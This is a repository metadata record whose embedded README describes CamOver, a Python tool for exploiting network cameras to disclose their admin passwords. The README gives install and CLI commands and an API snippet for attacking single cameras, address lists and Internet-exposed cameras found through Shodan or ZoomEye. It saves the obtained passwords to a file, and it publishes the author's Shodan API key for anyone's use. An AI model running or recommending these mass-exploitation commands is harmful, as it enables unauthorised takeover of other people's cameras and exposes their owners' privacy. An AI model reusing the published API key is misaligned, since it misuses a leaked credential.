{"id":21845265,"url":"https://github.com/entysec/camover","last_synced_at":"2025-10-11T05:34:25.229Z","repository":{"id":41085616,"uuid":"370036658","full_name":"EntySec/CamOver","owner":"EntySec","description":" CamOver is a camera exploitation tool that allows to disclosure network camera admin password.","archived":false,"fork":false,"pushed_at":"2024-07-17T23:12:08.000Z","size":96,"stargazers_count":521,"open_issues_count":1,"forks_count":113,"subscribers_count":12,"default_branch":"main","last_synced_at":"2025-05-24T19:06:22.520Z","etag":null,"topics":["camera","camera-control","camera-exploitation","camera-hacking","entysec","exploit","iot","iot-hacking","webcam-hacking"],"latest_commit_sha":null,"homepage":"https://entysec.com","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/EntySec.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null},"funding":{"github":"entysec"}},"created_at":"2021-05-23T11:38:23.000Z","updated_at":"2025-05-22T09:11:22.000Z","dependencies_parsed_at":"2024-01-08T22:28:11.536Z","dependency_job_id":"29ca0d50-34b4-49ec-a8c0-1d3e40b607bf","html_url":"https://github.com/EntySec/CamOver","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/EntySec/CamOver","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/EntySec%2FCamOver","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/EntySec%2FCamOver/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/EntySec%2FCamOver/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/EntySec%2FCamOver/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/EntySec","download_url":"https://codeload.github.com/EntySec/CamOver/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/EntySec%2FCamOver/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":279006322,"owners_count":26084085,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-11T02:00:06.511Z","response_time":55,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["camera","camera-control","camera-exploitation","camera-hacking","entysec","exploit","iot","iot-hacking","webcam-hacking"],"created_at":"2024-11-27T23:08:53.855Z","updated_at":"2025-10-11T05:34:25.214Z","avatar_url":"https://github.com/EntySec.png","language":"Python","funding_links":["https://github.com/sponsors/entysec"],"categories":[],"sub_categories":[],"readme":"# CamOver\n\n[![Developer](https://img.shields.io/badge/developer-EntySec-blue.svg)](https://entysec.com)\n[![Language](https://img.shields.io/badge/language-Python-blue.svg)](https://github.com/EntySec/CamOver)\n[![Forks](https://img.shields.io/github/forks/EntySec/CamOver?style=flat\u0026color=green)](https://github.com/EntySec/CamOver/forks)\n[![Stars](https://img.shields.io/github/stars/EntySec/CamOver?style=flat\u0026color=yellow)](https://github.com/EntySec/CamOver/stargazers)\n[![CodeFactor](https://www.codefactor.io/repository/github/EntySec/CamOver/badge)](https://www.codefactor.io/repository/github/EntySec/CamOver)\n\nCamOver is a camera exploitation tool that allows to disclosure network camera admin password.\n\n## Features\n\n* Exploits vulnerabilities in most popular camera models such as `CCTV`, `GoAhead` and `Netwave`.\n* Optimized to exploit multiple cameras at one time from list with threading enabled.\n* Simple CLI and API usage.\n\n## Installation\n\n```shell\npip3 install git+https://github.com/EntySec/CamOver\n```\n\n## Basic usage\n\nTo use CamOver just type `camover` in your terminal.\n\n```\nusage: camover [-h] [-t] [-o OUTPUT] [-i INPUT] [-a ADDRESS] [--shodan SHODAN]\n               [--zoomeye ZOOMEYE] [-p PAGES]\n\nCamOver is a camera exploitation tool that allows to disclosure network camera\nadmin password.\n\noptional arguments:\n  -h, --help            show this help message and exit\n  -t, --threads         Use threads for fastest work.\n  -o OUTPUT, --output OUTPUT\n                        Output result to file.\n  -i INPUT, --input INPUT\n                        Input file of addresses.\n  -a ADDRESS, --address ADDRESS\n                        Single address.\n  --shodan SHODAN       Shodan API key for exploiting devices over Internet.\n  --zoomeye ZOOMEYE     ZoomEye API key for exploiting devices over Internet.\n  -p PAGES, --pages PAGES\n                        Number of pages you want to get from ZoomEye.\n```\n\n### Examples\n\n**Exploiting single camera**\n\nLet's hack my camera just for fun.\n\n```shell\ncamover -a 192.168.99.100\n```\n\n**Exploiting cameras from Internet**\n\nLet's try to use Shodan search engine to exploit cameras over Internet, we will use it with `-t` for fast exploitation.\n\n```shell\ncamover -t --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD\n```\n\n**NOTE:** Given Shodan API key (`PSKINdQe1GyxGgecYz2191H2JoS9qvgD`) is my PRO API key, you can use this key or your own,\nbe free to use all our resources for free :)\n\n**Exploiting cameras from input file**\n\nLet's try to use opened database of cameras with `-t` for fast exploitation.\n\n```shell\ncamover -t -i cameras.txt -o passwords.txt\n```\n\n**NOTE:** It will exploit all cameras in `cameras.txt` list by their addresses and save all obtained passwords\nto `passwords.txt`.\n\n## API usage\n\nCamOver also has their own Python API that can be invoked by importing CamOver to your code.\n\n```python\nfrom camover import CamOver\n```\n\n### Basic functions\n\nThere are all CamOver basic functions that can be used to exploit specified camera.\n\n* `exploit(address)` - Exploit single camera by given address.\n\n### Examples\n\n**Exploiting single camera**\n\n```python\nfrom camover import CamOver\n\ncamover = CamOver()\ncreds = camover.exploit('192.168.99.100')\n\nprint(creds)\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fentysec%2Fcamover","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fentysec%2Fcamover","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fentysec%2Fcamover/lists"}